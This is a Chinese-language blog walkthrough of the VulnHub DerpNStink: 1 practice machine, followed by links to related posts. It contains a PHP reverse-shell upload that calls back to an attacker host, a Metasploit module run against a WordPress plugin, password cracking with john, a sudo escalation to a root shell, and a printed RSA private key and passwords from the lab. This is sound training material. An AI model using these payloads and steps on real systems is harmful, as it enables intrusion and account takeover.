DerpNStink: 1靶机攻略

最新推荐文章于 2024-07-22 21:49:24 发布
最新推荐文章于 2024-07-22 21:49:24 发布
阅读量237 收藏
点赞数
分类专栏: 网络安全基础 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46107438/article/details/132135770
版权

DerpNStink: 1靶机攻略

文章目录

各种扫描

  • 演示中靶机IP:192.168.88.129

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

#可进入的网页
http://192.168.88.129/
http://192.168.88.129/weblog/wp-admin/
http://192.168.88.129/weblog/
http://192.168.88.129/robots.txt
http://192.168.88.129/temporary/
http://192.168.88.129/php/phpmyadmin/

翻网页

  • 搜索到flag1

在这里插入图片描述

  • 浅浅试出了一个密码

在这里插入图片描述

  • 不是最新版本

在这里插入图片描述

  • 可以文件上传

在这里插入图片描述

  • phpmyadmin

在这里插入图片描述

企图建立连接

第一种:文件上传

  • 先在kali打开监听
nc -lvvp 8888
  • 利用之前找的上传入口上传
<?php
$sock = fsockopen('192.168.88.128',8888);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>

在这里插入图片描述

  • 连接成功

在这里插入图片描述

第二种:扫描漏洞

  • 使用WordPress漏洞扫描工具wpscan
wpscan --url http://derpnstink.local/weblog/

  • 发现问题
slideshow gallery

在这里插入图片描述

  • 找到攻击模块并使用
msfconsole
search slideshow gallery
use 0
set rhosts 192.168.88.129
set targeturi /weblog/
set wp_password admin
set wp_user admin
run

在这里插入图片描述

  • 连接成功

在这里插入图片描述

  • 进入shell

在这里插入图片描述

翻找文件

  • 有两个用户:
mrderp
stinky

在这里插入图片描述

  • 四处搜寻未果,想办法进入之前的数据库

  • /var/www/html/weblog页面找到博客配置文件wp-config.php

在这里插入图片描述

  • 发现数据库账户密码
root:mysql

在这里插入图片描述

进入数据库

在这里插入图片描述

在这里插入图片描述

  • 破解密码:–在/usr/share/wordlists/ 目录下有个rockyou压缩包,解压后可做为字典使用,比较大
john who --wordlist=../usr/share/wordlists/rockyou.txt
#指定字典破解
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41   #Unclestinky:wedgie57
$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/   #admin:admin
  • 启用终端,尝试登入
python -c "import pty;pty.spawn('/bin/bash')"
  • stinky尝试成功

在这里插入图片描述

翻用户文件

  • 找到一个key.txt

在这里插入图片描述

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
  • 一个.pcap文件

在这里插入图片描述

  • flag3

在这里插入图片描述

查看数据包文件

在这里插入图片描述

  • 找到密码 #找http中的post
mrderp:derpderpderpderpderpderpderp

sudo提权

在这里插入图片描述

  • 在指定目录里创建文件

在这里插入图片描述

mkdir 。。。
# 创建目录
echo '/bin/sh' > derpy.sh   
#也可以是"/bin/bash"等其他内容
chmod 777 derpy.sh
#赋权
sudo ./derpy.sh
#提权

注:

ssh -i key stinky@192.168.88.129 
#使用密钥登录  key即密钥文件
Change State
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub:DeRPnStiNK
墨染的博客
10-09 1681
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
渗透项目(七):DERPNSTINK: 1
Ays.Ie的博客
11-12 1469
本篇文章记录了作者第7个渗透项目,具体记录了渗透过程以及方法。
【渗透测试】VulnHub-DerpNStink: 1
m0_52923241的博客
11-21 3065
VulnHub-DerpNStink: 1VulnHub-DerpNStink: 1渗透测试详细流程小知识点常用工具 VulnHub-DerpNStink: 1渗透测试详细流程 小知识点 常用工具
VulnHub靶场篇15-DerpNStink:1
qq_35224240的博客
03-18 405
靶机地址:DerpNStink:1~ VulnHub 难易程度:3.0 / 10.0 文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢! 摘要:基础信息扫描后,访问网站服务,审查得到Flag1。使用WPScan扫描到slideshow-gallery插件的任意文件上传,通过msf得到一个网站shell,在配置文件中找到数据库密码,登陆进phpmyadmin,得到Flag2。破解数据库中用户的密码哈希值,使用jonh破解,使用su切换到sti.
看完这篇 教你玩转渗透测试靶机Vulnhub——DerpNStink:1
Aluxian_的博客
02-02 1585
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagmedium (中等的)1.信息收集工具得使用2.wpscan和msfconsole的使用,了解模块的利用3.curl读取源码,以及msf反弹shell到本机 (这个是新知识的需要学习)4.数据库的增删改查 以及查看的相关命令,john字典爆破5.SSH。
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulhub渗透测试靶机学习1
08-08
【渗透测试靶机学习】 渗透测试靶机是安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 1942
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 791
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 908
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
No.7-VulnHub-DerpNStink: 1-Walkthrough渗透学习
qq_34801745的博客
01-04 1613
** VulnHub-DerpNStink: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中级(CTF) 靶机发布日期:2018年2月9日 靶机描述:This is a boot2root Ubuntu based virtual machine. It was tested on VMwar...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(五)DerpNStink:1【从外部网站到穿透内网提权!! !】
hyjcking的博客
11-28 880
这台靶机我用了将近两天的时间才拿下,真的是比较有难度的一台中级靶机,里面涉及到了许多渗透测试的知识和技巧,值得花时间好好研究一番。可以发现建站用的是wordpress,hh这就很舒服了,一般在打靶的时候发现wordpress建站说明就是突破口,我们可以用wpscan扫一下。得到密码为wedgie57,再登录一下刚才登的网站,用户名是Unclestinky,只找到了之前在数据库发现的flag2,没有其他信息了。之前nmap扫出来过22端口,尝试ssh登录,发现没法用密码登录,需要指纹密钥。
【甄选靶场】Vulnhub百个项目渗透——项目七:DerpNStink-1(sql注入,流量分析)
人间体佐菲的博客
08-23 2122
【专为新人甄选】Vulnhub百个项目渗透——项目七:DerpNStink-1
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
LinuxLinux发展史
最新发布
weixin_51142926的博客
07-22 4297
大家好!此篇文章并非技术博文,而是简单了解Linux的时代背景和发展史,只有知其所以然才能让我们更好地让走进Liunx的世界!
linux代填密码切换用户
zixuanyankai的博客
07-22 317
linux用户账户密码复杂,在不考虑安全的情况下,想要使用命令自动切换用户。
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值